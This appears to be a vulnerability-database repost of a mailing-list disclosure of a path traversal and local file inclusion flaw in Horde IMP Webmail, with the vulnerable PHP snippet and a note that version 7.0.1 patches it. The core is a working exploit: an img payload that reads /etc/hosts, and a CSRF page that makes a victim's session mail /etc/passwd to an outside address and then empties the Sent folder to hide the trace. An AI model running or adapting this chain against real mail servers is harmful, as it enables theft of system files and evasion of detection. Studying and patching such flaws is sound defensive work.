Lucene search
K

📄 Horde Groupware IMP Webmail Path Traversal / Local File Inclusion

🗓️ 03 Jul 2026 00:00:00Reported by Evan from Evan.latType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 16 Views

Horde Groupware IMP Webmail has a path traversal local file inclusion flaw that may bypass authentication.

Code
this is my first time sending to a mailing list so ive chosen
    something easy. here goes:
    
    Summary: Horde Groupware’s IMP Webmail solution contains a path
    traversal/local file inclusion vulnerability which could be exploited
    to escalate privileges or bypass authentication (through CSRF if
    unauthenticated).
    
    the vulnerability is in here:
    
    } elseif (strcasecmp($node->tagName, 'IMG') === 0) {
                    /* Check for smileys. They live in the JS directory, under
                     * the base ckeditor directory, so search for that and replace
                     * with the filesystem information if found (Request
                     * #13051). Need to ignore other image links that may have
                     * been explicitly added by the user. */
                    $js_path = strval(Horde::url($registry->get('jsuri',
    'horde'), true));
                    if (stripos($src, $js_path . '/ckeditor') === 0) {
                        $file = str_replace(
                            $js_path,
                            $registry->get('jsfs', 'horde'),
                            $src
                        );
    
                        if (is_readable($file)) {
                            $data_part = new Horde_Mime_Part();
                            $data_part->setContents(file_get_contents($file));
                          ...
    
    as seen, we control $file, which is just the src in <img src="">. to
    get past the checks to hit our file_get_contents sink, we can just
    satisfy the stripos check. our (elementary) exploit is thus:
    --
    <img src="https://webmail.foo.com/js/ckeditor/../../../../../../etc/hosts">
    --
    this is likely very chainable with any other existing primitive to
    achieve rce on horde IMP. for example, heres an easy csrf chain:
    
    --
    <!DOCTYPE html>
    <html>
    
    <body>
        <h1>yo</h1>
        <script>
            var p1 = new FormData();
            p1.append('to', '[email protected]');
            // land in spam
            p1.append('subject', 'hai');
            p1.append('html', '1');
            p1.append('message',
                '<html><body>bye<img
    src="http://targ/horde/js/ckeditor/../../../../etc/passwd"></body></html>');
    
            p1.append('identity', '0');
            p1.append('priority', 'normal');
            p1.append('request_read_receipt', '0');
            p1.append('save_sent_mail', '1');
            fetch('http://targ/horde/services/ajax.php/imp/sendMessage', {
                    method: 'POST',
                    body: p1,
                    credentials: 'include',
                    mode: 'no-cors'
                })
                .then(() => {
                    console.log("* bye");
                    setTimeout(() => {
                        var p2 = new FormData();
                        p2.append('mbox', 'U0VOVA'); // b64 SENT
                        // delete
    
    fetch('http://targ/horde/services/ajax.php/imp/emptyMailbox', {
                            method: 'POST',
                            body: p2,
                            credentials: 'include',
                            mode: 'no-cors'
                        });
                    }, 2000);
                });
        </script>
    </body>
    
    </html>
    --
    
    PATCH:
    update to horde imp 7.0.1 for the patch.

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Jul 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9
16